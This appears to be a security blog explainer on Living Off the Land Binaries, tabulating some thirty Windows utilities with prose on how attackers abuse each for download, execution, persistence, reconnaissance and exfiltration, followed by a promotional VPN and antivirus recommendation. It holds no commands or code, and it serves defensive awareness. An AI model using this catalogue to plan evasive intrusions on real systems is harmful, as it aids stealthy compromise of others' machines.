So, you want to know what are LoLBins? You’re at right place. Here’s an expanded table with additional LoLBin tools and their use in Living-off-the-Land (LoTL) attacks.
What are LoLBins?
LOLBins is the abbreviated term for Living Off the Land Binaries. Living Off the Land Binaries are binaries of a non-malicious nature, local to the operating system, that have been utilised and exploited by cyber criminals and crime groups to camouflage their malicious activity.
List of LoLBins Used By Cybercrimals in Cyber Attacks
| LoLBin | How Cyber Criminals Use The Tool to Perform LoTL Attacks |
| PowerShell | Used for downloading and executing malicious scripts, fileless malware execution, reconnaissance, and data exfiltration, often bypassing traditional antivirus defenses |
| certutil | Abused to download malicious files, decode Base64-encoded payloads, and as a simple data exfiltration tool by copying data to a remote server |
| Mshta | Executes malicious JavaScript or VBScript hosted remotely or locally, allowing attackers to execute code within the user’s context without raising suspicion |
| wmic | Used for remote code execution, reconnaissance, and lateral movement by running commands on remote systems, often bypassing security controls |
| rundll32 | Executes DLL files and scripts, allowing attackers to run malicious code or scripts without dropping an executable on disk, aiding in evasion of antivirus |
| regsvr32 | Utilized to execute malicious scripts or COM objects via .sct files, aiding in fileless attacks and bypassing application whitelisting |
| schtasks | Creates or modifies scheduled tasks for persistence, enabling attackers to execute malicious code at specified times or after system reboots |
| bitsadmin | Abused to download files or execute commands, often used to download malicious payloads stealthily from the internet or an intranet server |
| at | Similar to `schtasks`, used to schedule tasks for executing malicious commands, particularly on older systems where `schtasks` is unavailable |
| cmd.exe | The command prompt itself can be used for executing malicious scripts, commands, and facilitating various types of attacks while blending in with normal operations |
| msiexec | Exploited to download and execute malicious MSI packages or scripts, allowing attackers to deliver payloads and execute them silently without dropping an executable |
| conhost | Used in conjunction with other tools like PowerShell to hide the command prompt window when running malicious commands, helping avoid detection |
| netsh | Abused to create firewall exceptions, set up network redirections, or configure proxy settings to bypass network security controls and exfiltrate data through network tunneling |
| taskkill | Used to terminate security-related processes or services, enabling attackers to disable security defenses during an attack, thereby avoiding detection or interruption |
| bginfo | Abused to execute arbitrary commands while displaying system information, used to run malicious code disguised as part of legitimate system management tasks, often as part of a larger attack chain |
| mavinject | Injects code into running processes, which can be used for stealthy execution of malicious code within trusted processes, bypassing security software |
| msdt | Windows troubleshooting utility that can be used to execute PowerShell commands or scripts by exploiting vulnerabilities like Follina, allowing attackers to run code remotely with minimal detection |
| cscript | Executes VBScript and JScript files, often used to run malicious scripts as part of fileless attacks or in conjunction with other LoLBins like `mshta` or `regsvr32`, enabling attackers to execute code without dropping files on disk |
| wscript | Similar to `cscript`, used for executing malicious scripts, often as part of phishing campaigns or lateral movement techniques within a compromised network |
| sc.exe | Used to create, configure, or start/stop services, enabling attackers to create malicious services for persistence or to run malicious code with system privileges, which can be particularly dangerous if the service is run as a privileged user |
| whoami | Used by attackers to enumerate user permissions, privileges, and group memberships, aiding in privilege escalation and lateral movement within a compromised network |
| reg.exe | Used to manipulate the Windows Registry, allowing attackers to establish persistence, disable security features, or execute malicious payloads upon system reboot or user login |
| findstr | Abused to search for sensitive information within files, such as passwords or tokens, which can then be exfiltrated by the attacker for further exploitation or lateral movement |
| cacls | Abused to modify file permissions, allowing attackers to escalate privileges or lock legitimate users out of files, potentially leading to further compromise or denial of service attacks |
| net.exe | Exploited to enumerate users, groups, shares, and sessions within a network, as well as to add users or modify group memberships, often as part of lateral movement or privilege escalation strategies |
| wmiprvse.exe | Used by attackers to execute WMI (Windows Management Instrumentation) commands for system reconnaissance, process creation, or remote command execution, often without leaving traces that would trigger traditional detection mechanisms |
| nltest | Abused to query domain information, identify domain controllers, and test trust relationships, which can be leveraged by attackers to facilitate lateral movement and further network compromise, particularly in Active Directory environments |
| powershell_ise | Used similarly to PowerShell but in an integrated scripting environment, which can provide a more stealthy means of script execution and testing by attackers within compromised environments, often bypassing detection mechanisms focused on standard PowerShell activity |
| esentutl | A database utility used to extract and manipulate data from database files, which can be exploited to access sensitive information or to establish persistence by modifying the database or recovering data from deleted files that may contain valuable information for attackers |
| Forfiles | Abused to execute commands on a collection of files, often used by attackers for mass data exfiltration or modification, enabling them to operate on multiple files simultaneously without triggering alerts, particularly in automated environments where such operations may go unnoticed |
| expand.exe | A tool used to extract files from compressed CAB files, which can be exploited by attackers to deploy malware hidden within such archives, enabling the installation of malicious software that might bypass basic signature-based detection mechanisms |
| clip.exe | Used to redirect command output to the clipboard, which can be leveraged by attackers to silently steal sensitive information from command-line outputs without leaving obvious traces, enabling exfiltration of critical data in a stealthy manner |
| makecab.exe | Used to create CAB files from a set of files, which can be exploited by attackers to compress and package malware or sensitive data for exfiltration, often bypassing basic data loss prevention (DLP) mechanisms due to the use of a legitimate and commonly whitelisted utility |
This expanded table includes a wide array of LoLBins that attackers can exploit for various stages of an attack, from initial compromise to lateral movement, persistence, and data exfiltration. These tools are favored because they blend in with normal system activity, making detection more challenging for traditional security measures.
Protective Measures While Combating LoLBins
Combating LoLBins is literally fist fighting with notorious cyber threat actors. If you’re not careful, you may endup in a disaster. Staying protected is key before taking down adversaries. It is always recommended to use a VPN service like NordVPN, Surfshark, or PureVPN and use security solutions like Panda Security or MalwareBytes while performing the analysis to stay protected.
For cybersecurity news and updates, follow us on Cybersecurity – The SOC Labs.
Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The SOC Labs assumes no liability for the accuracy or consequences of using this information.
